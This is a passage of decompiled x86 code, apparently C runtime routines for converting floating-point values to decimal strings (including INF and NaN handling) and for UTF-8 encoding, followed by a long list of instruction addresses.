              															asm("adc edx, 0x0");
              															_t1287 = _t1287 + 1;
              															_t1174 = _t1247;
              															__eflags = _t1287 - _v1920;
              														} while (_t1287 != _v1920);
              														__eflags = _t1174;
              														if(_t1174 == 0) {
              															goto L246;
              														} else {
              															_t945 = _v472;
              															__eflags = _t945 - 0x73;
              															if(_t945 >= 0x73) {
              																L260:
              																_v2420 = 0;
              																_v472 = 0;
              																E6DA90928( &_v468, _t1323,  &_v2416, 0);
              																_t1348 =  &(_t1348[0x10]);
              																_t922 = 0;
              															} else {
              																 *(_t1344 + _t945 * 4 - 0x1d0) = _t1174;
              																_v472 = _v472 + 1;
              																goto L246;
              															}
              														}
              													}
              												}
              											} else {
              												_v2420 = 0;
              												_v472 = 0;
              												_push(0);
              												_t919 =  &_v2416;
              												L245:
              												_push(_t919);
              												_push(_t1323);
              												_push( &_v468);
              												E6DA90928();
              												_t1348 =  &(_t1348[0x10]);
              												L246:
              												_t922 = _t1122;
              											}
              										}
              									} else {
              										_t1288 = _v1396;
              										__eflags = _t1288;
              										if(_t1288 != 0) {
              											__eflags = _t1288 - _t1122;
              											if(_t1288 == _t1122) {
              												goto L198;
              											} else {
              												__eflags = _v472;
              												if(_v472 == 0) {
              													goto L198;
              												} else {
              													_t1175 = 0;
              													_v1936 = _v472;
              													_t1328 = 0;
              													__eflags = 0;
              													do {
              														_t948 = _t1288;
              														_t1248 = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) >> 0x20;
              														 *(_t1344 + _t1328 * 4 - 0x1d0) = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) + _t1175;
              														asm("adc edx, 0x0");
              														_t1328 = _t1328 + 1;
              														_t1175 = _t1248;
              														__eflags = _t1328 - _v1936;
              													} while (_t1328 != _v1936);
              													__eflags = _t1175;
              													if(_t1175 == 0) {
              														goto L198;
              													} else {
              														_t951 = _v472;
              														__eflags = _t951 - 0x73;
              														if(_t951 >= 0x73) {
              															_v2420 = 0;
              															_v472 = 0;
              															E6DA90928( &_v468, 0x1cc,  &_v2416, 0);
              															_t1348 =  &(_t1348[0x10]);
              															_t922 = 0;
              															goto L199;
              														} else {
              															 *(_t1344 + _t951 * 4 - 0x1d0) = _t1175;
              															_v472 = _v472 + 1;
              															goto L198;
              														}
              													}
              												}
              											}
              											goto L265;
              										} else {
              											__eflags = 0;
              											_v2420 = 0;
              											_v472 = 0;
              											E6DA90928( &_v468, 0x1cc,  &_v2416, 0);
              											_t1348 =  &(_t1348[0x10]);
              											L198:
              											_t922 = _t1122;
              										}
              										L199:
              										_t1323 = 0x1cc;
              									}
              									L247:
              									__eflags = _t922;
              									if(_t922 == 0) {
              										_v2420 = _v2420 & 0x00000000;
              										_v472 = _v472 & 0x00000000;
              										_push(0);
              										L263:
              										_push( &_v2416);
              										_t899 =  &_v468;
              										goto L264;
              									} else {
              										goto L248;
              									}
              									goto L265;
              									L248:
              									_t850 = _v1916 - _v1880;
              									__eflags = _t850;
              									_v1916 = _t850;
              								} while (_t850 != 0);
              								_t1150 = _v1908;
              								goto L250;
              							}
              						} else {
              							_t960 = _t848 / _t1149;
              							_v1876 = _t960;
              							_t1176 = _t848 % _t1149;
              							_v1936 = _t1176;
              							__eflags = _t960;
              							if(_t960 == 0) {
              								L178:
              								__eflags = _t1176;
              								if(_t1176 != 0) {
              									_t961 =  *(0x6daa6f14 + _t1176 * 4);
              									_v1936 = _t961;
              									__eflags = _t961;
              									if(_t961 != 0) {
              										__eflags = _t961 - _t1122;
              										if(_t961 != _t1122) {
              											_t1177 = _v936;
              											__eflags = _t1177;
              											if(_t1177 != 0) {
              												_v1876 = _v1876 & 0x00000000;
              												_t1289 = 0;
              												__eflags = 0;
              												do {
              													_t1250 = _t961 *  *(_t1344 + _t1289 * 4 - 0x3a0) >> 0x20;
              													 *(_t1344 + _t1289 * 4 - 0x3a0) = _t961 *  *(_t1344 + _t1289 * 4 - 0x3a0) + _v1876;
              													_t961 = _v1936;
              													asm("adc edx, 0x0");
              													_t1289 = _t1289 + 1;
              													_v1876 = _t1250;
              													__eflags = _t1289 - _t1177;
              												} while (_t1289 != _t1177);
              												__eflags = _t1250;
              												if(_t1250 != 0) {
              													_t964 = _v936;
              													__eflags = _t964 - 0x73;
              													if(_t964 >= 0x73) {
              														goto L180;
              													} else {
              														 *(_t1344 + _t964 * 4 - 0x3a0) = _t1250;
              														_v936 = _v936 + 1;
              													}
              												}
              											}
              										}
              									} else {
              										L180:
              										_v2420 = 0;
              										_v936 = 0;
              										_push(0);
              										goto L184;
              									}
              								}
              							} else {
              								do {
              									__eflags = _t960 - 0x26;
              									if(_t960 > 0x26) {
              										_t960 = 0x26;
              									}
              									_t1178 =  *(0x6daa6e7e + _t960 * 4) & 0x000000ff;
              									_v1868 = _t960;
              									_v1400 = ( *(0x6daa6e7f + _t960 * 4) & 0x000000ff) + ( *(0x6daa6e7e + _t960 * 4) & 0x000000ff);
              									E6DA8B0A0(_t1178 << 2,  &_v1396, 0, _t1178 << 2);
              									_t977 = E6DA8AB10( &(( &_v1396)[_t1178]), 0x6daa6578 + ( *(0x6daa6e7c + _v1868 * 4) & 0x0000ffff) * 4, ( *(0x6daa6e7f + _t960 * 4) & 0x000000ff) << 2);
              									_t1251 = _v1400;
              									_t1348 =  &(_t1348[0x18]);
              									_v1872 = _t1251;
              									__eflags = _t1251 - _t1122;
              									if(_t1251 > _t1122) {
              										__eflags = _v936 - _t1122;
              										if(_v936 > _t1122) {
              											__eflags = _t1251 - _v936;
              											_t1330 =  &_v1396;
              											_t340 = _t1251 - _v936 > 0;
              											__eflags = _t340;
              											_t978 = _t977 & 0xffffff00 | _t340;
              											if(_t340 >= 0) {
              												_t1330 =  &_v932;
              											}
              											_v1896 = _t1330;
              											__eflags = _t978;
              											if(_t978 == 0) {
              												_v1892 = _t1251;
              												_t1251 = _v936;
              												_v1872 = _t1251;
              												_v1916 =  &_v1396;
              											} else {
              												_v1892 = _v936;
              												_v1916 =  &_v932;
              											}
              											_t980 = 0;
              											_t1292 = 0;
              											_v1864 = 0;
              											__eflags = _t1251;
              											if(_t1251 == 0) {
              												L172:
              												_v936 = _t980;
              												_t1323 = 0x1cc;
              												_t981 = _t980 << 2;
              												__eflags = _t981;
              												_push(_t981);
              												_t982 =  &_v1860;
              												goto L173;
              											} else {
              												do {
              													__eflags =  *(_t1330 + _t1292 * 4);
              													if( *(_t1330 + _t1292 * 4) != 0) {
              														_t1179 = 0;
              														_t1331 = _t1292;
              														_v1880 = 0;
              														_v1900 = 0;
              														__eflags = _v1892;
              														if(_v1892 != 0) {
              															_t1252 = 0;
              															while(1) {
              																__eflags = _t1331 - 0x73;
              																if(_t1331 == 0x73) {
              																	break;
              																}
              																__eflags = _t1331 - _t980;
              																if(_t1331 == _t980) {
              																	 *(_t1344 + _t1331 * 4 - 0x740) =  *(_t1344 + _t1331 * 4 - 0x740) & 0x00000000;
              																	_t372 = _t1292 + 1; // 0x1
              																	_t998 = _t372 + _t1179;
              																	__eflags = _t998;
              																	_v1864 = _t998;
              																}
              																_t993 =  *(_v1916 + _t1179 * 4);
              																_t1182 = _v1896;
              																_t1252 = _t993 *  *(_t1182 + _t1292 * 4) >> 0x20;
              																asm("adc edx, 0x0");
              																 *(_t1344 + _t1331 * 4 - 0x740) = _t993 *  *(_t1182 + _t1292 * 4) +  *(_t1344 + _t1331 * 4 - 0x740) + _v1880;
              																_t980 = _v1864;
              																asm("adc edx, 0x0");
              																_t1179 = _v1900 + 1;
              																_v1880 = _t1252;
              																_t1331 = _t1331 + 1;
              																_v1900 = _t1179;
              																__eflags = _t1179 - _v1892;
              																if(_t1179 != _v1892) {
              																	continue;
              																}
              																break;
              															}
              															__eflags = _t1252;
              															if(_t1252 != 0) {
              																_t1181 =  &_v1860 + _t1331 * 4;
              																_v1880 = _t1181;
              																while(1) {
              																	__eflags = _t1331 - 0x73;
              																	if(_t1331 == 0x73) {
              																		goto L168;
              																	}
              																	__eflags = _t1331 - _t980;
              																	if(_t1331 == _t980) {
              																		 *_t1181 =  *_t1181 & 0x00000000;
              																		__eflags =  *_t1181;
              																		_t402 = _t1331 + 1; // 0x1
              																		_v1864 = _t402;
              																	}
              																	_v1880 = _v1880 + 4;
              																	_t991 = _t1252;
              																	_t1331 = _t1331 + 1;
              																	_t1252 = 0;
              																	 *_t1181 =  *_t1181 + _t991;
              																	__eflags =  *_t1181;
              																	_t980 = _v1864;
              																	asm("adc edx, edx");
              																	if( *_t1181 != 0) {
              																		_t1181 = _v1880;
              																		continue;
              																	}
              																	goto L168;
              																}
              															}
              															L168:
              															_t1251 = _v1872;
              														}
              														__eflags = _t1331 - 0x73;
              														if(_t1331 == 0x73) {
              															__eflags = 0;
              															_t1323 = 0x1cc;
              															_v2420 = 0;
              															_v936 = 0;
              															_push(0);
              															_t988 =  &_v2416;
              															goto L182;
              														} else {
              															_t1330 = _v1896;
              															goto L171;
              														}
              													} else {
              														__eflags = _t1292 - _t980;
              														if(_t1292 == _t980) {
              															 *(_t1344 + _t1292 * 4 - 0x740) =  *(_t1344 + _t1292 * 4 - 0x740) & 0x00000000;
              															_t361 = _t1292 + 1; // 0x1
              															_t980 = _t361;
              															_v1864 = _t980;
              														}
              														goto L171;
              													}
              													goto L175;
              													L171:
              													_t1292 = _t1292 + 1;
              													__eflags = _t1292 - _t1251;
              												} while (_t1292 != _t1251);
              												goto L172;
              											}
              										} else {
              											_t1293 = _v932;
              											_t1323 = 0x1cc;
              											_v1920 = _t1293;
              											_v936 = _t1251;
              											E6DA90928( &_v932, 0x1cc,  &_v1396, _t1251 << 2);
              											_t1348 =  &(_t1348[0x10]);
              											__eflags = _t1293;
              											if(_t1293 != 0) {
              												__eflags = _t1293 - _t1122;
              												if(_t1293 == _t1122) {
              													goto L174;
              												} else {
              													__eflags = _v936;
              													if(_v936 == 0) {
              														goto L174;
              													} else {
              														_t1186 = 0;
              														_v1900 = _v936;
              														_t1294 = 0;
              														__eflags = 0;
              														do {
              															_t1006 = _v1920;
              															_t1253 = _t1006 *  *(_t1344 + _t1294 * 4 - 0x3a0) >> 0x20;
              															 *(_t1344 + _t1294 * 4 - 0x3a0) = _t1006 *  *(_t1344 + _t1294 * 4 - 0x3a0) + _t1186;
              															asm("adc edx, 0x0");
              															_t1294 = _t1294 + 1;
              															_t1186 = _t1253;
              															__eflags = _t1294 - _v1900;
              														} while (_t1294 != _v1900);
              														__eflags = _t1186;
              														if(_t1186 == 0) {
              															goto L174;
              														} else {
              															_t1009 = _v936;
              															__eflags = _t1009 - 0x73;
              															if(_t1009 >= 0x73) {
              																_v1400 = 0;
              																_v936 = 0;
              																_push(0);
              																_t988 =  &_v1396;
              																L182:
              																_push(_t988);
              																_push(_t1323);
              																_push( &_v932);
              																E6DA90928();
              																_t1348 =  &(_t1348[0x10]);
              																_t985 = 0;
              															} else {
              																 *(_t1344 + _t1009 * 4 - 0x3a0) = _t1186;
              																_v936 = _v936 + 1;
              																goto L174;
              															}
              														}
              													}
              												}
              											} else {
              												_v1400 = 0;
              												_v936 = 0;
              												_push(0);
              												_t982 =  &_v1396;
              												L173:
              												_push(_t982);
              												_push(_t1323);
              												_push( &_v932);
              												E6DA90928();
              												_t1348 =  &(_t1348[0x10]);
              												L174:
              												_t985 = _t1122;
              											}
              										}
              									} else {
              										_t1295 = _v1396;
              										__eflags = _t1295;
              										if(_t1295 != 0) {
              											__eflags = _t1295 - _t1122;
              											if(_t1295 == _t1122) {
              												goto L125;
              											} else {
              												__eflags = _v936;
              												if(_v936 == 0) {
              													goto L125;
              												} else {
              													_t1187 = 0;
              													_v1920 = _v936;
              													_t1332 = 0;
              													__eflags = 0;
              													do {
              														_t1013 = _t1295;
              														_t1254 = _t1013 *  *(_t1344 + _t1332 * 4 - 0x3a0) >> 0x20;
              														 *(_t1344 + _t1332 * 4 - 0x3a0) = _t1013 *  *(_t1344 + _t1332 * 4 - 0x3a0) + _t1187;
              														asm("adc edx, 0x0");
              														_t1332 = _t1332 + 1;
              														_t1187 = _t1254;
              														__eflags = _t1332 - _v1920;
              													} while (_t1332 != _v1920);
              													__eflags = _t1187;
              													if(_t1187 == 0) {
              														goto L125;
              													} else {
              														_t1016 = _v936;
              														__eflags = _t1016 - 0x73;
              														if(_t1016 >= 0x73) {
              															_v1400 = 0;
              															_v936 = 0;
              															E6DA90928( &_v932, 0x1cc,  &_v1396, 0);
              															_t1348 =  &(_t1348[0x10]);
              															_t985 = 0;
              															goto L126;
              														} else {
              															 *(_t1344 + _t1016 * 4 - 0x3a0) = _t1187;
              															_v936 = _v936 + 1;
              															goto L125;
              														}
              													}
              												}
              											}
              											goto L265;
              										} else {
              											__eflags = 0;
              											_v1864 = 0;
              											_v936 = 0;
              											E6DA90928( &_v932, 0x1cc,  &_v1860, 0);
              											_t1348 =  &(_t1348[0x10]);
              											L125:
              											_t985 = _t1122;
              										}
              										L126:
              										_t1323 = 0x1cc;
              									}
              									L175:
              									__eflags = _t985;
              									if(_t985 == 0) {
              										_v2420 = _v2420 & 0x00000000;
              										_t428 =  &_v936;
              										 *_t428 = _v936 & 0x00000000;
              										__eflags =  *_t428;
              										_push(0);
              										L184:
              										_push( &_v2416);
              										_t899 =  &_v932;
              										L264:
              										_push(_t1323);
              										_push(_t899);
              										E6DA90928();
              										_t1348 =  &(_t1348[0x10]);
              									} else {
              										goto L176;
              									}
              									goto L265;
              									L176:
              									_t960 = _v1876 - _v1868;
              									__eflags = _t960;
              									_v1876 = _t960;
              								} while (_t960 != 0);
              								_t1176 = _v1936;
              								goto L178;
              							}
              						}
              						L265:
              						_t1151 = _v472;
              						_t1276 = _v1888;
              						_v1872 = _t1276;
              						__eflags = _t1151;
              						if(_t1151 != 0) {
              							_v1876 = _v1876 & 0x00000000;
              							_t1281 = 0;
              							__eflags = 0;
              							do {
              								_t888 =  *(_t1344 + _t1281 * 4 - 0x1d0);
              								_t1242 = 0xa;
              								_t1243 = _t888 * _t1242 >> 0x20;
              								 *(_t1344 + _t1281 * 4 - 0x1d0) = _t888 * _t1242 + _v1876;
              								asm("adc edx, 0x0");
              								_t1281 = _t1281 + 1;
              								_v1876 = _t1243;
              								__eflags = _t1281 - _t1151;
              							} while (_t1281 != _t1151);
              							_t1276 = _v1872;
              							__eflags = _t1243;
              							if(_t1243 != 0) {
              								_t891 = _v472;
              								__eflags = _t891 - 0x73;
              								if(_t891 >= 0x73) {
              									__eflags = 0;
              									_v2420 = 0;
              									_v472 = 0;
              									E6DA90928( &_v468, _t1323,  &_v2416, 0);
              									_t1348 =  &(_t1348[0x10]);
              								} else {
              									 *(_t1344 + _t891 * 4 - 0x1d0) = _t1243;
              									_v472 = _v472 + 1;
              								}
              							}
              						}
              						_t853 = E6DA904A0( &_v472,  &_v936);
              						_t1154 = _v1888;
              						_t1233 = 0xa;
              						__eflags = _t853 - _t1233;
              						if(_t853 != _t1233) {
              							__eflags = _t853;
              							if(_t853 != 0) {
              								_t1276 = _t1154 + 1;
              								 *_t1154 = _t853 + 0x30;
              								_v1872 = _t1276;
              								goto L280;
              							} else {
              								_t855 = _v1904 - 1;
              								goto L281;
              							}
              							goto L312;
              						} else {
              							_t879 = _v936;
              							_t1276 = _t1154 + 1;
              							_v1904 = _v1904 + 1;
              							 *_t1154 = 0x31;
              							_v1872 = _t1276;
              							_v1908 = _t879;
              							__eflags = _t879;
              							if(_t879 != 0) {
              								_t1280 = 0;
              								_t1163 = 0;
              								__eflags = 0;
              								do {
              									_t880 =  *(_t1344 + _t1163 * 4 - 0x3a0);
              									 *(_t1344 + _t1163 * 4 - 0x3a0) = _t880 * _t1233 + _t1280;
              									asm("adc edx, 0x0");
              									_t1163 = _t1163 + 1;
              									_t1280 = _t880 * _t1233 >> 0x20;
              									_t1233 = 0xa;
              									__eflags = _t1163 - _v1908;
              								} while (_t1163 != _v1908);
              								_v1908 = _t1280;
              								__eflags = _t1280;
              								_t1276 = _v1872;
              								if(_t1280 != 0) {
              									_t1164 = _v936;
              									__eflags = _t1164 - 0x73;
              									if(_t1164 >= 0x73) {
              										_v2420 = 0;
              										_v936 = 0;
              										E6DA90928( &_v932, _t1323,  &_v2416, 0);
              										_t1348 =  &(_t1348[0x10]);
              									} else {
              										 *((intOrPtr*)(_t1344 + _t1164 * 4 - 0x3a0)) = _v1908;
              										_t719 =  &_v936;
              										 *_t719 = _v936 + 1;
              										__eflags =  *_t719;
              									}
              								}
              								_t1154 = _v1888;
              							}
              							L280:
              							_t855 = _v1904;
              						}
              						L281:
              						 *((intOrPtr*)(_v1932 + 4)) = _t855;
              						_t1235 = _v1928;
              						__eflags = _t855;
              						if(_t855 >= 0) {
              							__eflags = _t1235 - 0x7fffffff;
              							if(_t1235 <= 0x7fffffff) {
              								__eflags = _a16;
              								if(_a16 == 0) {
              									_t1235 = _t1235 + _t855;
              									__eflags = _t1235;
              								}
              							}
              						}
              						_t857 = _a28 - 1;
              						__eflags = _t857 - _t1235;
              						if(_t857 >= _t1235) {
              							_t857 = _t1235;
              						}
              						_t858 = _t857 + _t1154;
              						_t1227 = 0;
              						_v1876 = _t858;
              						_v1881 = 0;
              						__eflags = _t1276 - _t858;
              						if(_t1276 != _t858) {
              							while(1) {
              								_t863 = _v472;
              								_v1908 = _t863;
              								__eflags = _t863;
              								if(_t863 == 0) {
              									goto L309;
              								}
              								_t1278 = 0;
              								_t1158 = 0;
              								__eflags = 0;
              								do {
              									_t864 =  *(_t1344 + _t1158 * 4 - 0x1d0);
              									_t1237 = _t864 * 0x3b9aca00 >> 0x20;
              									 *(_t1344 + _t1158 * 4 - 0x1d0) = _t864 * 0x3b9aca00 + _t1278;
              									asm("adc edx, 0x0");
              									_t1158 = _t1158 + 1;
              									_t1278 = 0x3b9aca00;
              									__eflags = _t1158 - _v1908;
              								} while (_t1158 != _v1908);
              								_v1908 = 0x3b9aca00;
              								__eflags = 0x3b9aca00;
              								_t1279 = _v1872;
              								if(0x3b9aca00 != 0) {
              									_t1162 = _v472;
              									__eflags = _t1162 - 0x73;
              									if(_t1162 >= 0x73) {
              										__eflags = 0;
              										_v2420 = 0;
              										_v472 = 0;
              										E6DA90928( &_v468, _t1323,  &_v2416, 0);
              										_t1348 =  &(_t1348[0x10]);
              									} else {
              										 *(_t1344 + _t1162 * 4 - 0x1d0) = _t1237;
              										_v472 = _v472 + 1;
              									}
              								}
              								_t869 = E6DA904A0( &_v472,  &_v936);
              								_v1928 = 8;
              								_t1154 = _v1876 - _t1279;
              								__eflags = _t1154;
              								do {
              									_v1908 = _t869 / _v1924;
              									_t1240 = _t869 % _v1924 + 0x30;
              									_t871 = _v1928;
              									__eflags = _t1154 - _t871;
              									if(_t1154 > _t871) {
              										 *((char*)(_t871 + _t1279)) = _t1240;
              										goto L304;
              									} else {
              										__eflags = _t1240 - 0x30;
              										if(_t1240 == 0x30) {
              											L304:
              											_t1227 = _v1881;
              										} else {
              											_t1227 = _t1122;
              											_v1881 = _t1227;
              										}
              									}
              									_t872 = _t871 - 1;
              									_v1928 = _t872;
              									__eflags = _t872 - 0xffffffff;
              									_t869 = _v1908;
              								} while (_t872 != 0xffffffff);
              								__eflags = _t1154 - 9;
              								if(_t1154 > 9) {
              									_t1154 = 9;
              								}
              								_t1276 = _t1279 + _t1154;
              								_v1872 = _t1276;
              								__eflags = _t1276 - _v1876;
              								if(_t1276 != _v1876) {
              									continue;
              								}
              								goto L309;
              							}
              						}
              						L309:
              						 *_t1276 = 0;
              						__eflags = _v472;
              						if(_v472 != 0) {
              							goto L311;
              						} else {
              							__eflags = _t1227;
              							if(__eflags != 0) {
              								goto L311;
              							}
              						}
              						goto L312;
              					} else {
              						_t1154 = _v1932;
              						 *((intOrPtr*)(_v1932 + 4)) = _t1122;
              						_t1101 = _t819 - 1;
              						__eflags = _t1101;
              						if(_t1101 == 0) {
              							_t1102 = E6DA92110(_v1888, _a28, "1#INF");
              							__eflags = _t1102;
              							if(_t1102 != 0) {
              								goto L315;
              							} else {
              								L311:
              								_t1122 = 0;
              								__eflags = 0;
              								goto L312;
              							}
              						} else {
              							_t1113 = _t1101 - 1;
              							__eflags = _t1113;
              							if(_t1113 == 0) {
              								_push("1#QNAN");
              								goto L20;
              							} else {
              								_t1115 = _t1113 - 1;
              								__eflags = _t1115;
              								if(_t1115 == 0) {
              									_push("1#SNAN");
              									goto L20;
              								} else {
              									__eflags = _t1115 != 1;
              									if(_t1115 != 1) {
              										goto L24;
              									} else {
              										_push("1#IND");
              										goto L20;
              									}
              								}
              							}
              						}
              					}
              				} else {
              					_t1154 = _t1315 & 0x000fffff;
              					if((_a4 | _t1315 & 0x000fffff) == 0 || (_v1956 & 0x01000000) != 0) {
              						_push(0x6daa8f20);
              						 *((intOrPtr*)(_v1932 + 4)) =  *(_v1932 + 4) & 0x00000000;
              						L20:
              						_push(_a28);
              						_push(_v1888);
              						if(E6DA92110() != 0) {
              							L315:
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0);
              							E6DA8DAEC();
              							asm("int3");
              							_push(_t1344);
              							_t1267 = _v2448;
              							__eflags = _t1267;
              							if(_t1267 != 0) {
              								_t1220 = _a4;
              								__eflags = _t1220;
              								if(_t1220 != 0) {
              									__eflags = _t1220 & 0xffffff80;
              									if((_t1220 & 0xffffff80) != 0) {
              										_push(_t1122);
              										_push(_t1315);
              										__eflags = _t1220 & 0xfffff800;
              										if((_t1220 & 0xfffff800) != 0) {
              											__eflags = _t1220 & 0xffff0000;
              											if((_t1220 & 0xffff0000) != 0) {
              												__eflags = _t1220 & 0xffe00000;
              												if((_t1220 & 0xffe00000) != 0) {
              													goto L337;
              												} else {
              													__eflags = _t1220 - 0x10ffff;
              													if(_t1220 > 0x10ffff) {
              														goto L337;
              													} else {
              														_push(3);
              														_t1133 = 0xf0;
              														goto L333;
              													}
              												}
              											} else {
              												__eflags = _t1220 - 0xd800;
              												if(_t1220 < 0xd800) {
              													L329:
              													_push(2);
              													_t1133 = 0xe0;
              													L333:
              													_pop(1);
              													goto L334;
              												} else {
              													__eflags = _t1220 - 0xdfff;
              													if(_t1220 <= 0xdfff) {
              														L337:
              														_t1105 = E6DAA0C51(_a8, _a12);
              													} else {
              														goto L329;
              													}
              												}
              											}
              										} else {
              											_t1133 = 0xc0;
              											L334:
              											_push(_t1269);
              											_t1312 = 1;
              											do {
              												_t1106 = _t1220;
              												_t1220 = _t1220 >> 6;
              												 *(_t1312 + _t1267) = _t1106 & 0x0000003f | 0x00000080;
              												_t1312 = _t1312 - 1;
              												__eflags = _t1312;
              											} while (_t1312 != 0);
              											 *_t1267 = _t1220 | _t1133;
              											_t1105 = E6DAA0C3D(2, _a8);
              										}
              										return _t1105;
              									} else {
              										 *_t1267 = _t1220;
              										goto L319;
              									}
              								} else {
              									 *_t1267 = _t1220;
              									goto L318;
              								}
              							} else {
              								_t1220 = 0;
              								__eflags = 0;
              								L318:
              								_t1112 = _a8;
              								 *_t1112 = _t1220;
              								 *(_t1112 + 4) = _t1220;
              								L319:
              								__eflags = 1;
              								return 1;
              							}
              						} else {
              							L312:
              							_t1358 = _v1944;
              							_pop(_t1277);
              							_pop(_t1324);
              							if(_v1944 != 0) {
              								E6DAA096F(_t1154, _t1358,  &_v1952);
              							}
              							_pop(_t1127);
              							return E6DA89B91(_t1122, _t1127, _v8 ^ _t1344, _t1227, _t1277, _t1324);
              						}
              					} else {
              						goto L12;
              					}
              				}
              			}
              0x6da9d126
              0x6da9d135
              0x6da9d13b
              0x6da9d140
              0x6da9d143
              0x6da9d146
              0x6da9d179
              0x6da9d17f
              0x6da9d185
              0x6da9d187
              0x6da9d18d
              0x6da9d190
              0x00000000
              0x6da9d192
              0x6da9d192
              0x6da9d195
              0x6da9d196
              0x6da9d19c
              0x6da9d1a2
              0x6da9d1a4
              0x6da9d1ac
              0x6da9d1ac
              0x6da9d1b4
              0x6da9d1b7
              0x6da9d1bd
              0x6da9d1bd
              0x6da9d1bf
              0x6da9d1c6
              0x6da9d1c6
              0x6da9d1c1
              0x6da9d1c1
              0x6da9d1c1
              0x6da9d1c8
              0x6da9d1ce
              0x6da9d1d1
              0x6da9d1d3
              0x6da9d1d9
              0x6da9d1d9
              0x6da9d1d5
              0x6da9d1d5
              0x6da9d1d5
              0x6da9d1fd
              0x6da9d205
              0x6da9d214
              0x6da9d215
              0x6da9d218
              0x6da9d21e
              0x6da9d21f
              0x6da9d225
              0x6da9d22b
              0x00000000
              0x00000000
              0x6da9d22d
              0x6da9d22d
              0x6da9d235
              0x6da9d235
              0x6da9d23b
              0x6da9d23d
              0x6da9d23f
              0x6da9d247
              0x6da9d247
              0x6da9d247
              0x6da9d24f
              0x6da9d24f
              0x6da9d148
              0x6da9d148
              0x6da9d14b
              0x6da9d151
              0x6da9d166
              0x6da9d16b
              0x6da9d16b
              0x6da9d255
              0x6da9d25f
              0x6da9cef0
              0x6da9cef0
              0x6da9cef0
              0x6da9cef2
              0x6da9cef9
              0x6da9cf00
              0x00000000
              0x00000000
              0x6da9cf06
              0x6da9cf09
              0x6da9cf0c
              0x00000000
              0x6da9cf0e
              0x6da9cf0e
              0x6da9cf1a
              0x6da9cf22
              0x6da9cf28
              0x6da9cf32
              0x6da9cf38
              0x6da9cf3d
              0x6da9cf43
              0x6da9cf44
              0x6da9cf44
              0x6da9cf44
              0x6da9cf4b
              0x6da9cf51
              0x6da9cf53
              0x6da9cf60
              0x6da9cf63
              0x6da9cf6e
              0x6da9cf6e
              0x6da9cf6e
              0x6da9cf65
              0x6da9cf66
              0x6da9cf66
              0x6da9cf75
              0x6da9cf7b
              0x6da9cf80
              0x6da9cf83
              0x6da9cf86
              0x6da9cfb9
              0x6da9cfbf
              0x6da9cfc5
              0x6da9cfc7
              0x6da9cfcd
              0x6da9cfd0
              0x00000000
              0x6da9cfd2
              0x6da9cfd2
              0x6da9cfd5
              0x6da9cfd6
              0x6da9cfdc
              0x6da9cfe2
              0x6da9cfe4
              0x6da9cfec
              0x6da9cfec
              0x6da9cff4
              0x6da9cff7
              0x6da9cffd
              0x6da9cffd
              0x6da9cfff
              0x6da9d006
              0x6da9d006
              0x6da9d001
              0x6da9d001
              0x6da9d001
              0x6da9d008
              0x6da9d00e
              0x6da9d011
              0x6da9d013
              0x6da9d019
              0x6da9d019
              0x6da9d015
              0x6da9d015
              0x6da9d015
              0x6da9d03d
              0x6da9d045
              0x6da9d054
              0x6da9d055
              0x6da9d058
              0x6da9d05e
              0x6da9d05f
              0x6da9d065
              0x6da9d06b
              0x00000000
              0x00000000
              0x6da9d06d
              0x6da9d06d
              0x6da9d075
              0x6da9d075
              0x6da9d07b
              0x6da9d07d
              0x6da9d07f
              0x6da9d087
              0x6da9d087
              0x6da9d087
              0x6da9d08f
              0x6da9d08f
              0x6da9cf88
              0x6da9cf88
              0x6da9cf8b
              0x6da9cf91
              0x6da9cfa6
              0x6da9cfab
              0x6da9cfab
              0x6da9d097
              0x6da9d098
              0x6da9d09e
              0x6da9d09e
              0x00000000
              0x6da9cf0c
              0x00000000
              0x6da9cef2
              0x6da9d09f
              0x6da9d09f
              0x6da9d0ac
              0x6da9d0b3
              0x6da9d0b9
              0x6da9d0ba
              0x6da9d0bb
              0x6da9d0c1
              0x6da9d0c6
              0x6da9d0c6
              0x6da9d498
              0x6da9d4a2
              0x6da9d4a3
              0x6da9d4a9
              0x6da9d4ab
              0x6da9d9a9
              0x6da9d9ab
              0x6da9d9ad
              0x6da9d9b3
              0x6da9d9b5
              0x6da9d9bb
              0x6da9d9bd
              0x6da9dd9f
              0x6da9dd9f
              0x6da9dda1
              0x6da9dda7
              0x6da9ddae
              0x6da9ddb4
              0x6da9ddb6
              0x6da9de69
              0x6da9de69
              0x6da9de6b
              0x6da9de6c
              0x6da9de72
              0x00000000
              0x6da9ddbc
              0x6da9ddbc
              0x6da9ddbe
              0x6da9ddc4
              0x6da9ddca
              0x6da9ddcc
              0x6da9ddd2
              0x6da9ddd9
              0x6da9ddd9
              0x6da9dddb
              0x6da9dddb
              0x6da9dde8
              0x6da9ddef
              0x6da9ddf5
              0x6da9ddf8
              0x6da9ddf9
              0x6da9ddff
              0x6da9ddff
              0x6da9de03
              0x6da9de05
              0x6da9de0b
              0x6da9de11
              0x6da9de14
              0x00000000
              0x6da9de16
              0x6da9de16
              0x6da9de1d
              0x6da9de1d
              0x6da9de14
              0x6da9de05
              0x6da9ddcc
              0x6da9ddbe
              0x6da9ddb6
              0x6da9d9c3
              0x6da9d9c3
              0x6da9d9c3
              0x6da9d9c6
              0x6da9d9ca
              0x6da9d9ca
              0x6da9d9cb
              0x6da9d9dd
              0x6da9d9ea
              0x6da9d9f9
              0x6da9da23
              0x6da9da28
              0x6da9da2e
              0x6da9da31
              0x6da9da37
              0x6da9da39
              0x6da9db0b
              0x6da9db11
              0x6da9dbdb
              0x6da9dbe1
              0x6da9dbe7
              0x6da9dbe7
              0x6da9dbe7
              0x6da9dbea
              0x6da9dbec
              0x6da9dbec
              0x6da9dbf2
              0x6da9dbf8
              0x6da9dbfa
              0x6da9dc16
              0x6da9dc22
              0x6da9dc28
              0x6da9dc2e
              0x6da9dbfc
              0x6da9dc02
              0x6da9dc0e
              0x6da9dc0e
              0x6da9dc34
              0x6da9dc36
              0x6da9dc38
              0x6da9dc3e
              0x6da9dc40
              0x6da9dd51
              0x6da9dd51
              0x6da9dd57
              0x6da9dd5c
              0x6da9dd5c
              0x6da9dd5f
              0x6da9dd60
              0x00000000
              0x6da9dc46
              0x6da9dc46
              0x6da9dc46
              0x6da9dc4a
              0x6da9dc6a
              0x6da9dc6c
              0x6da9dc6e
              0x6da9dc74
              0x6da9dc7a
              0x6da9dc80
              0x6da9dc86
              0x6da9dc88
              0x6da9dc88
              0x6da9dc8b
